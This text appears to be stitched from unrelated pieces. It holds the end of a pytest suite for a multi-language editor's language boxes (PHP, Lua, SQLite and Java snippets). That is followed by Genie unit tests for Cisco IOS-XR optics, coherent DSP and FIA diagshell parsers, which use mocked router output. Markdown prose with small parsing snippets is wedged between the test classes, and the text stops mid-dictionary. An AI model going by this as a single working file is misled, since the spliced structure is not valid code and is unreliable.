treemanager.add_parser(parser, lexer, "")
assert len(treemanager.parsers) == 1
p = """class C {
int x = 1;
}"""
treemanager.import_file(p)
assert len(treemanager.parsers) == 1
assert parser.last_status == True
treemanager.key_cursors(DOWN)
treemanager.key_end()
treemanager.key_cursors(LEFT)
treemanager.key_backspace()
for c in "$this . 'http://":
treemanager.key_normal(c)
treemanager.key_normal("'")
assert parser.last_status is True
assert len(treemanager.parsers) == 2
@pytest.mark.skipif("TRAVIS" in os.environ and os.environ["TRAVIS"] == "true", reason="SQLite takes too long to build on Travis. Skip!")
def test_lua_sqlite_expand(self):
grm = load_json_grammar("test/luasqlite_expr.json")
parser, lexer = grm.load()
parser.setup_autolbox(grm.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
p = """x = 1
y = 2"""
for c in p:
treemanager.key_normal(c)
assert len(treemanager.parsers) == 1
assert parser.last_status == True
treemanager.key_cursors(UP)
treemanager.key_end()
treemanager.key_backspace()
p2 = "INSERT INTO k2 VALUES(a, NULL); PRAGMA f(k2);"
for c in p2:
treemanager.key_normal(c)
assert len(treemanager.parsers) == 2
assert parser.last_status == True
@pytest.mark.skipif("TRAVIS" in os.environ and os.environ["TRAVIS"] == "true", reason="SQLite takes too long to build on Travis. Skip!")
def test_sqlite_java_shrink(self):
grm = load_json_grammar("test/sqlitejava_expr.json")
parser, lexer = grm.load()
parser.setup_autolbox(grm.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
p = "SELECT a FROM t;"
for c in p:
treemanager.key_normal(c)
assert len(treemanager.parsers) == 1
assert parser.last_status == True
treemanager.key_home()
for i in range(8):
treemanager.key_cursors(RIGHT)
treemanager.key_normal("(")
treemanager.key_normal(")")
treemanager.key_normal(".") # wrap `a(). FROM` in lbox
treemanager.key_normal("d") # shrink box to `a().d`
assert len(treemanager.parsers) == 2
assert parser.last_status == True
@pytest.mark.skipif("TRAVIS" in os.environ and os.environ["TRAVIS"] == "true", reason="SQLite takes too long to build on Travis. Skip!")
def test_lua_sqlite_bug(self):
grm = load_json_grammar("test/luasqlite_expr.json")
parser, lexer = grm.load()
parser.setup_autolbox(grm.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
p = """x = 1,2
y = 2"""
for c in p:
treemanager.key_normal(c)
assert len(treemanager.parsers) == 1
assert parser.last_status == True
treemanager.key_cursors(UP)
treemanager.key_end()
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_backspace()
p2 = "SELECT a FROM t1;"
for c in p2:
treemanager.key_normal(c)
assert len(treemanager.parsers) == 2
assert parser.last_status == True
# Python
import unittest
from unittest.mock import Mock
# Genie
from genie.metaparser.util.exceptions import SchemaEmptyParserError
# iosxr show_controllers
from genie.libs.parser.iosxr.show_controllers import (ShowControllersCoherentDSP,
ShowControllersOptics,
ShowControllersFiaDiagshellL2showLocation,
ShowControllersFiaDiagshellDiagEgrCalendarsLocation)
# =====================================================
# Unit test for 'show controllers coherentDSP {port}'
# =====================================================
class test_show_controllers_coherentDSP(unittest.TestCase):
'''Unit test for show controllers coherentDSP {port}'''
maxDiff = None
empty_output = {'execute.return_value': ''}
golden_parsed_output = {
"0/0/1/2": {
"port": "CoherentDSP 0/0/1/2",
"controller_state": "Up",
"inherited_secondary_state": "Normal",
"configured_secondary_state": "Normal",
"derived_state": "In Service",
"loopback_mode": "None",
"ber_thresholds_sf": "1.0E-5",
"ber_thresholds_sd": "1.0E-7",
"performance_monitoring": "Enable",
"alarm_info": {
"los": 1,
"lof": 0,
"lom": 0,
"oof": 0,
"oom": 0,
"ais": 0,
"iae": 0,
"biae": 0,
"sf_ber": 0,
"sd_ber": 0,
"bdi": 2,
"tim": 0,
"fecmis_match": 0,
"fec_unc": 0
},
"detected_alarms": "None",
"bit_error_rate_info": {
"prefec_ber": "0.0E+00",
"postfec_ber": "0.0E+00",
},
"otu_tti": "Received",
"fec_mode": "STANDARD"
},
}
golden_output = {'execute.return_value': '''
#show controllers coherentDSP 0/0/1/2
Sat Aug 3 03:10:15.685 EST
Port : CoherentDSP 0/0/1/2
Controller State : Up
Inherited Secondary State : Normal
Configured Secondary State : Normal
Derived State : In Service
Loopback mode : None
BER Thresholds : SF = 1.0E-5 SD = 1.0E-7
Performance Monitoring : Enable
Alarm Information:
LOS = 1 LOF = 0 LOM = 0
OOF = 0 OOM = 0 AIS = 0
IAE = 0 BIAE = 0 SF_BER = 0
SD_BER = 0 BDI = 2 TIM = 0
FECMISMATCH = 0 FEC-UNC = 0
Detected Alarms : None
Bit Error Rate Information
PREFEC BER : 0.0E+00
POSTFEC BER : 0.0E+00
OTU TTI Received
FEC mode : STANDARD
'''}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowControllersCoherentDSP(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse(port='0/0/1/2')
def test_golden(self):
self.device = Mock(**self.golden_output)
obj = ShowControllersCoherentDSP(device=self.device)
parsed_output = obj.parse(port='0/0/1/2')
self.assertEqual(parsed_output, self.golden_parsed_output)
# ==================================================
# Unit test for 'show controllers optics {port}'
# ==================================================
class test_show_controllers_optics(unittest.TestCase):
'''Unit test for show controllers optics {port}'''
maxDiff = None
empty_output = {'execute.return_value': ''}
golden_parsed_output1 = {
"0/0/0/0": {
"name": "Optics 0/0/0/0",
"controller_state": "Up",
"transport_admin_state": "In Service",
"laser_state": "On",
"led_state": "Green",
"optics_status": {
"optics_type": "SFP+ 10G SR",
"wavelength": "850.00 nm",
"alarm_status": {
"detected_alarms": [],
},
"los_lol_fault_status": {},
"laser_bias_current": "6.1 mA",
"actual_tx_power": "-2.45 dBm",
"rx_power": "-7.56 dBm",
"performance_monitoring": "Enable",
"threshold_values": {
"Rx Power Threshold(dBm)": {
"parameter": "Rx Power Threshold(dBm)",
"high_alarm": "2.0",
"low_alarm": "-13.9",
"high_warning": "-1.0",
"low_warning": "-9.9"
},
"Tx Power Threshold(dBm)": {
"parameter": "Tx Power Threshold(dBm)",
"high_alarm": "1.6",
"low_alarm": "-11.3",
"high_warning": "-1.3",
"low_warning": "-7.3"
},
"LBC Threshold(mA)": {
"parameter": "LBC Threshold(mA)",
"high_alarm": "10.00",
"low_alarm": "2.00",
"high_warning": "10.00",
"low_warning": "2.00"
},
"Temp. Threshold(celsius)": {
"parameter": "Temp. Threshold(celsius)",
"high_alarm": "75.00",
"low_alarm": "-5.00",
"high_warning": "70.00",
"low_warning": "0.00"
},
"Voltage Threshold(volt)": {
"parameter": "Voltage Threshold(volt)",
"high_alarm": "3.63",
"low_alarm": "2.97",
"high_warning": "3.46",
"low_warning": "3.13"
}
},
"polarization_parameters": "not supported by optics",
"temperature": "35.00 Celsius",
"voltage": "3.26 V"
},
"transceiver_vendor_details": {
"form_factor": "SFP+",
"optics_type": "SFP+ 10G SR",
"name": "CISCO-AVAGO",
"oui_number": "00.17.6a",
"part_number": "SFBR-7702SDZ-CS5",
"rev_number": "G2.5",
"serial_number": "AGD162040SP",
"pid": "SFP-10G-SR",
"vid": "V03",
"date_code": "12/05/20"
}
}
}
golden_output1 = {'execute.return_value': '''
#show controllers optics 0/0/0/0
Sat Aug 3 03:11:08.682 EST
Controller State: Up
Transport Admin State: In Service
Laser State: On
LED State: Green
Optics Status
Optics Type: SFP+ 10G SR
Wavelength = 850.00 nm
Alarm Status:
-------------
Detected Alarms: None
LOS/LOL/Fault Status:
Laser Bias Current = 6.1 mA
Actual TX Power = -2.45 dBm
RX Power = -7.56 dBm
Performance Monitoring: Enable
THRESHOLD VALUES
----------------
Parameter High Alarm Low Alarm High Warning Low Warning
------------------------ ---------- --------- ------------ -----------
Rx Power Threshold(dBm) 2.0 -13.9 -1.0 -9.9
Tx Power Threshold(dBm) 1.6 -11.3 -1.3 -7.3
LBC Threshold(mA) 10.00 2.00 10.00 2.00
Temp. Threshold(celsius) 75.00 -5.00 70.00 0.00
Voltage Threshold(volt) 3.63 2.97 3.46 3.13
Polarization parameters not supported by optics
Temperature = 35.00 Celsius
Voltage = 3.26 V
Transceiver Vendor Details
Form Factor : SFP+
Optics type : SFP+ 10G SR
Name : CISCO-AVAGO
OUI Number : 00.17.6a
Part Number : SFBR-7702SDZ-CS5
Rev Number : G2.5
Serial Number : AGD162040SP
PID : SFP-10G-SR
VID : V03
Date Code(yy/mm/dd) : 12/05/20
'''}
golden_parsed_output2 = {
"0/0/1/2": {
"name": "Optics 0/0/1/2",
"controller_state": "Up",
"transport_admin_state": "In Service",
"laser_state": "On",
"led_state": "Green",
"optics_status": {
"optics_type": "CFP2 DWDM",
"dwdm_carrier_info": "C BAND",
"msa_itu_channel": "97",
"frequency": "191.30THz",
"wavelength": "1567.133nm",
"alarm_status": {
"detected_alarms": [],
},
"los_lol_fault_status": {},
"alarm_statistics": {
"high_rx_pwr": 0,
"low_rx_pwr": 1,
"high_tx_pwr": 0,
"low_tx_pwr": 1,
"high_lbc": 0,
"high_dgd": 0,
"oor_cd": 0,
"osnr": 0,
"wvl_ool": 0,
"mea": 0,
"improper_rem": 0,
"tc_power_prov_mismatch": 0
},
"laser_bias_current": "0.0 %",
"actual_tx_power": "0.99 dBm",
"rx_power": "-20.50 dBm",
"performance_monitoring": "Enable",
"threshold_values": {
"Rx Power Threshold(dBm)": {
"parameter": "Rx Power Threshold(dBm)",
"high_alarm": "1.5",
"low_alarm": "-30.0",
"high_warning": "0.0",
"low_warning": "0.0"
},
"Tx Power Threshold(dBm)": {
"parameter": "Tx Power Threshold(dBm)",
"high_alarm": "3.5",
"low_alarm": "-10.0",
"high_warning": "0.0",
"low_warning": "0.0"
},
"LBC Threshold(mA)": {
"parameter": "LBC Threshold(mA)",
"high_alarm": "N/A",
"low_alarm": "N/A",
"high_warning": "0.00",
"low_warning": "0.00"
}
},
"lbc_high_threshold": "98 %",
"configured_tx_power": "1.00 dBm",
"configured_osnr_lower_threshold": "0.00 dB",
"configured_dgd_higher_threshold": "180.00 ps",
"chromatic_dispersion": "5 ps/nm",
"configured_cd_min": "-10000 ps/nm ",
"configured_cd_max": "16000 ps/nm",
"optical_snr": "27.00 dB",
"polarization_dependent_loss": "0.00 dB",
"differential_group_delay": "2.00 ps"
},
"transceiver_vendor_details": {
"form_factor": "CFP2",
"name": "CISCO-ACACIA",
"part_number": "AC200-D23-190",
"rev_number": "16672",
"serial_number": "180653009",
"pid": "ONS-C2-WDM-DE-1HL",
"vid": "VES#",
"date_code": "18/02/03"
}
}
}
golden_output2 = {'execute.return_value': '''
#show controllers optics 0/0/1/2
Sat Aug 3 03:11:51.141 EST
Controller State: Up
Transport Admin State: In Service
Laser State: On
LED State: Green
Optics Status
Optics Type: CFP2 DWDM
DWDM carrier Info: C BAND, MSA ITU Channel=97, Frequency=191.30THz,
Wavelength=1567.133nm
Alarm Status:
-------------
Detected Alarms: None
LOS/LOL/Fault Status:
Alarm Statistics:
-------------
HIGH-RX-PWR = 0 LOW-RX-PWR = 1
HIGH-TX-PWR = 0 LOW-TX-PWR = 1
HIGH-LBC = 0 HIGH-DGD = 0
OOR-CD = 0 OSNR = 0
WVL-OOL = 0 MEA = 0
IMPROPER-REM = 0
TX-POWER-PROV-MISMATCH = 0
Laser Bias Current = 0.0 %
Actual TX Power = 0.99 dBm
RX Power = -20.50 dBm
Performance Monitoring: Enable
THRESHOLD VALUES
----------------
Parameter High Alarm Low Alarm High Warning Low Warning
------------------------ ---------- --------- ------------ -----------
Rx Power Threshold(dBm) 1.5 -30.0 0.0 0.0
Tx Power Threshold(dBm) 3.5 -10.0 0.0 0.0
LBC Threshold(mA) N/A N/A 0.00 0.00
LBC High Threshold = 98 %
Configured Tx Power = 1.00 dBm
Configured OSNR lower Threshold = 0.00 dB
Configured DGD Higher Threshold = 180.00 ps
Chromatic Dispersion 5 ps/nm
Configured CD-MIN -10000 ps/nm CD-MAX 16000 ps/nm
Optical Signal to Noise Ratio = 27.00 dB
Polarization Dependent Loss = 0.00 dB
Differential Group Delay = 2.00 ps
Transceiver Vendor Details
Form Factor : CFP2
Name : CISCO-ACACIA
Part Number : AC200-D23-190
Rev Number : 16672
Serial Number : 180653009
PID : ONS-C2-WDM-DE-1HL
VID : VES#
Date Code(yy/mm/dd) : 18/02/03
'''}
golden_parsed_output3 = {
"0/0/0/20": {
"name": "Optics 0/0/0/20",
"controller_state": "Down",
"transport_admin_state": "In Service",
"laser_state": "Off",
"optics_status": {
"optics_type": "Unavailable",
"dwdm_carrier_info": "Unavailable",
"msa_itu_channel": "Unavailable",
"frequency": "Unavailable",
"wavelength": "Unavailable",
"actual_tx_power": "Unavailable",
"rx_power": "Unavailable"
}
}
}
golden_output3 = {'execute.return_value': '''
#show controllers optics 0/0/0/20
Sat Aug 3 03:15:25.076 EST
Controller State: Down
Transport Admin State: In Service
Laser State: Off
Optics not present
Optics Type: Unavailable
DWDM Carrier Info: Unavailable, MSA ITU Channel= Unavailable, Frequency= Unavailable , Wavelength= Unavailable
TX Power = Unavailable
RX Power = Unavailable
'''}
golden_parsed_output4 = {
"0/0/0/18": {
"name": "Optics 0/0/0/18",
"controller_state": "Up",
"transport_admin_state": "In Service",
"laser_state": "Off",
"led_state": "Off",
"optics_status": {
"optics_type": "SFP+ 10G SR",
"wavelength": "850.00 nm",
"alarm_status": {
"detected_alarms": [
"LOW-RX1-PWR",
"LOW-TX1-PWR",
"LOW-TX1_LBC"
]
},
"los_lol_fault_status": {
"detected_los_lol_fault": [
"RX-LOS"
]
},
"laser_bias_current": "0.0 mA",
"actual_tx_power": "-17.25 dBm",
"rx_power": "-40.00 dBm",
"performance_monitoring": "Enable",
"threshold_values": {
"Rx Power Threshold(dBm)": {
"parameter": "Rx Power Threshold(dBm)",
"high_alarm": "2.0",
"low_alarm": "-13.9",
"high_warning": "-1.0",
"low_warning": "-9.9"
},
"Tx Power Threshold(dBm)": {
"parameter": "Tx Power Threshold(dBm)",
"high_alarm": "1.6",
"low_alarm": "-11.3",
"high_warning": "-1.3",
"low_warning": "-7.3"
},
"LBC Threshold(mA)": {
"parameter": "LBC Threshold(mA)",
"high_alarm": "11.00",
"low_alarm": "4.00",
"high_warning": "10.00",
"low_warning": "5.00"
},
"Temp. Threshold(celsius)": {
"parameter": "Temp. Threshold(celsius)",
"high_alarm": "75.00",
"low_alarm": "-5.00",
"high_warning": "70.00",
"low_warning": "0.00"
},
"Voltage Threshold(volt)": {
"parameter": "Voltage Threshold(volt)",
"high_alarm": "3.63",
"low_alarm": "2.97",
"high_warning": "3.46",
"low_warning": "3.13"
}
},
"polarization_parameters": "not supported by optics",
"temperature": "31.00 Celsius",
"voltage": "3.30 V"
},
"transceiver_vendor_details": {
"form_factor": "SFP+",
"optics_type": "SFP+ 10G SR",
"name": "CISCO-FINISAR",
"oui_number": "00.90.65",
"part_number": "FTLX8571D3BCL-C2",
"rev_number": "A",
"serial_number": "FNS210108H7",
"pid": "SFP-10G-SR",
"vid": "V03",
"date_code": "17/01/03"
}
}
}
golden_output4 = {'execute.return_value': '''
#show controllers optics 0/0/0/18
Sat Aug 3 03:19:06.519 EST
Controller State: Up
Transport Admin State: In Service
Laser State: Off
LED State: Off
Optics Status
Optics Type: SFP+ 10G SR
Wavelength = 850.00 nm
Alarm Status:
-------------
Detected Alarms:
LOW-RX1-PWR
LOW-TX1-PWR
LOW-TX1_LBC
LOS/LOL/Fault Status:
Detected LOS/LOL/FAULT: RX-LOS
Laser Bias Current = 0.0 mA
Actual TX Power = -17.25 dBm
RX Power = -40.00 dBm
Performance Monitoring: Enable
THRESHOLD VALUES
----------------
Parameter High Alarm Low Alarm High Warning Low Warning
------------------------ ---------- --------- ------------ -----------
Rx Power Threshold(dBm) 2.0 -13.9 -1.0 -9.9
Tx Power Threshold(dBm) 1.6 -11.3 -1.3 -7.3
LBC Threshold(mA) 11.00 4.00 10.00 5.00
Temp. Threshold(celsius) 75.00 -5.00 70.00 0.00
Voltage Threshold(volt) 3.63 2.97 3.46 3.13
Polarization parameters not supported by optics
Temperature = 31.00 Celsius
Voltage = 3.30 V
Transceiver Vendor Details
Form Factor : SFP+
Optics type : SFP+ 10G SR
Name : CISCO-FINISAR
OUI Number : 00.90.65
Part Number : FTLX8571D3BCL-C2
Rev Number : A
Serial Number : FNS210108H7
PID : SFP-10G-SR
VID : V03
Date Code(yy/mm/dd) : 17/01/03
'''}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowControllersOptics(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse(port='0/0/0/0')
def test_golden1(self):
self.device = Mock(**self.golden_output1)
obj = ShowControllersOptics(device=self.device)
parsed_output = obj.parse(port='0/0/0/0')
self.assertEqual(parsed_output, self.golden_parsed_output1)
def test_golden2(self):
self.device = Mock(**self.golden_output2)
obj = ShowControllersOptics(device=self.device)
parsed_output = obj.parse(port='0/0/1/2')
self.assertEqual(parsed_output, self.golden_parsed_output2)
def test_golden3(self):
self.device = Mock(**self.golden_output3)
obj = ShowControllersOptics(device=self.device)
parsed_output = obj.parse(port='0/0/0/20')
self.assertEqual(parsed_output, self.golden_parsed_output3)
def test_golden4(self):
self.device = Mock(**self.golden_output4)
obj = ShowControllersOptics(device=self.device)
parsed_output = obj.parse(port='0/0/0/18')
self.assertEqual(parsed_output, self.golden_parsed_output4)
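The `THRESHOLD VALUES` table in the optics transcripts has a free-form parameter name followed by exactly four numeric columns. A hedged sketch (not the genie implementation): because only the last four fields are single tokens, a right-hand split with `maxsplit=4` recovers both the multi-word name and the values:

```python
# One row of the THRESHOLD VALUES table from the transcripts above.
row = 'Rx Power Threshold(dBm)   2.0        -13.9      -1.0          -9.9'

# rsplit from the right keeps the spaces inside the parameter name intact.
parameter, high_alarm, low_alarm, high_warning, low_warning = row.rsplit(None, 4)
print(parameter)  # Rx Power Threshold(dBm)
print(low_alarm)  # -13.9
```

This trick only works because the name column never ends in a bare number; rows like `LBC Threshold(mA)  N/A  N/A  0.00  0.00` still split correctly since `N/A` is a single token.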
# ==============================================================================================
# Unit test for 'show controllers fia diagshell {diagshell_unit} "l2 show" location {location}'
# ==============================================================================================
class test_show_controllers_fia_diagshell_location(unittest.TestCase):
'''Unit test for:
* 'show controllers fia diagshell {diagshell_unit} "l2 show" location {location}'
'''
maxDiff = None
empty_output = {'execute.return_value': ''}
golden_parsed_output1 = {
'nodes':
{'0/0/CPU0':
{'vlan':
{4:
{'mac':
{'00:00:03:ff:01:0c':
{'encap_id': '0x301d',
'gport': '0xc000001',
'trunk': 1}}},
2522:
{'mac':
{'fc:00:00:ff:01:03':
{'encap_id': '0xffffffff',
'gport': '0x9800401d',
'static': True}}},
2524:
{'mac':
{'fc:00:00:ff:01:0c':
{'encap_id': '0x3001',
'gport': '0xc000000',
'static': True,
'trunk': 0}}},
2544:
{'mac':
{'fc:00:00:ff:01:8c':
{'encap_id': '0x2007',
'gport': '0x8000048'},
'fc:00:00:ff:01:9c':
{'encap_id': '0x2007',
'gport': '0x8000048',
'trunk': 0}}}}}}}
golden_output1 = {'execute.return_value': '''
RP/0/RP0/CPU0:UUT4#show controller fia diagshell 0 'l2 show' location all
Node ID: 0/0/CPU0
mac=fc:00:00:ff:01:8c vlan=2544 GPORT=0x8000048 encap_id=0x2007
mac=fc:00:00:ff:01:03 vlan=2522 GPORT=0x9800401d Static encap_id=0xffffffff
mac=fc:00:00:ff:01:9c vlan=2544 GPORT=0x8000048 Trunk=0 encap_id=0x2007
mac=fc:00:00:ff:01:0c vlan=2524 GPORT=0xc000000 Trunk=0 Static encap_id=0x3001
mac=00:00:03:ff:01:0c vlan=4 GPORT=0xc000001 Trunk=1 encap_id=0x301d
'''}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowControllersFiaDiagshellL2showLocation(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse()
def test_golden1(self):
self.device = Mock(**self.golden_output1)
obj = ShowControllersFiaDiagshellL2showLocation(device=self.device)
parsed_output = obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output1)
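Each `l2 show` line in the golden output above is a run of whitespace-separated tokens, most of the form `key=value`, with bare flags like `Static` carrying no `=`. As an illustrative sketch (again, not the genie parser itself), one pass over the tokens is enough:

```python
# A line taken from the golden output above.
line = 'mac=fc:00:00:ff:01:0c vlan=2524 GPORT=0xc000000 Trunk=0 Static encap_id=0x3001'

fields = {}
for token in line.split():
    if '=' in token:
        key, _, value = token.partition('=')
        fields[key] = value
    else:
        fields[token] = True  # bare flag token, e.g. Static

print(fields['vlan'])    # 2524
print(fields['Static'])  # True
```

`str.partition` is used rather than `split('=')` so a value containing `=` would still land entirely in `value`; the real parser additionally converts `vlan`/`Trunk` to integers when building the nested schema seen in `golden_parsed_output1`.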
# ==============================================================================================
# Unit test for 'show controllers fia diagshell 0 "diag egr_calendars" location all'
# ==============================================================================================
class TestShowControllersFiaDiagshellDiagEgrCalendarsLocation(unittest.TestCase):
'''Unit test for:
* 'show controllers fia diagshell 0 "diag egr_calendars" location all'
'''
maxDiff = None
empty_output = {'execute.return_value': ''}
golden_parsed_output1 = {
'node_id': {
'0/0/CPU0': {
'port': {
0: {
'e2e_if': 4,
'e2e_if_rate': 1050000,
'e2e_port_rate': 350000,
'egq_if': 28,
'egq_if_rate': 990000,
'egq_port_rate': 336671,
'high_calendar': 255,
'low_calendar': 4,
'priority': 'LOW',
},
1: {
'e2e_if': 36,
'e2e_if_rate': 105004160,
'e2e_port_rate': 105004160,
'egq_if': 1,
'egq_if_rate': 609052500,
'egq_port_rate': 101000014,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
5: {
'e2e_if': 37,
'e2e_if_rate': 105004160,
'e2e_port_rate': 105004160,
'egq_if': 2,
'egq_if_rate': 609052500,
'egq_port_rate': 101000014,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
9: {
'e2e_if': 38,
'e2e_if_rate': 105004160,
'e2e_port_rate': 105004160,
'egq_if': 3,
'egq_if_rate': 609052500,
'egq_port_rate': 101000014,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
13: {
'e2e_if': 35,
'e2e_if_rate': 105004160,
'e2e_port_rate': 105004160,
'egq_if': 0,
'egq_if_rate': 609052500,
'egq_port_rate': 101000014,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
17: {
'e2e_if': 39,
'e2e_if_rate': 105004160,
'e2e_port_rate': 105004160,
'egq_if': 4,
'egq_if_rate': 609052500,
'egq_port_rate': 101000014,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
21: {
'e2e_if': 40,
'e2e_if_rate': 105004160,
'e2e_port_rate': 105004160,
'egq_if': 5,
'egq_if_rate': 609052500,
'egq_port_rate': 101000014,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
25: {
'e2e_if': 50,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 48,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
26: {
'e2e_if': 38,
'e2e_if_rate': 1050112,
'e2e_port_rate': 1050112,
'egq_if': 36,
'egq_if_rate': 433417500,
'egq_port_rate': 1010003,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
27: {
'e2e_if': 36,
'e2e_if_rate': 1050112,
'e2e_port_rate': 1050112,
'egq_if': 34,
'egq_if_rate': 433417500,
'egq_port_rate': 1010003,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
28: {
'e2e_if': 51,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 49,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
29: {
'e2e_if': 37,
'e2e_if_rate': 1050112,
'e2e_port_rate': 1050112,
'egq_if': 35,
'egq_if_rate': 433417500,
'egq_port_rate': 1010003,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
30: {
'e2e_if': 78,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 76,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
31: {
'e2e_if': 41,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 39,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
32: {
'e2e_if': 80,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 78,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
33: {
'e2e_if': 35,
'e2e_if_rate': 1050112,
'e2e_port_rate': 1050112,
'egq_if': 33,
'egq_if_rate': 433417500,
'egq_port_rate': 1010003,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
34: {
'e2e_if': 40,
'e2e_if_rate': 1050112,
'e2e_port_rate': 1050112,
'egq_if': 38,
'egq_if_rate': 433417500,
'egq_port_rate': 1010003,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
35: {
'e2e_if': 39,
'e2e_if_rate': 1050112,
'e2e_port_rate': 1050112,
'egq_if': 37,
'egq_if_rate': 433417500,
'egq_port_rate': 1010003,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
36: {
'e2e_if': 49,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 47,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
37: {
'e2e_if': 53,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 51,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
38: {
'e2e_if': 42,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 40,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
39: {
'e2e_if': 81,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 79,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
40: {
'e2e_if': 79,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 77,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
41: {
'e2e_if': 43,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 41,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
42: {
'e2e_if': 52,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 50,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
43: {
'e2e_if': 44,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 42,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
44: {
'e2e_if': 82,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 80,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
45: {
'e2e_if': 45,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 43,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
46: {
'e2e_if': 46,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 44,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
47: {
'e2e_if': 47,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 45,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
48: {
'e2e_if': 48,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 46,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
49: {
'e2e_if': 55,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 53,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
50: {
'e2e_if': 75,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 73,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
51: {
'e2e_if': 73,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 71,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
52: {
'e2e_if': 72,
'e2e_if_rate': 10500096,
'e2e_port_rate': 10500096,
'egq_if': 70,
'egq_if_rate': 433417500,
'egq_port_rate': 10100011,
'high_calendar': 32,
'low_calendar': 32,
'priority': 'LOW',
},
53: {
'e2e_if': 71,
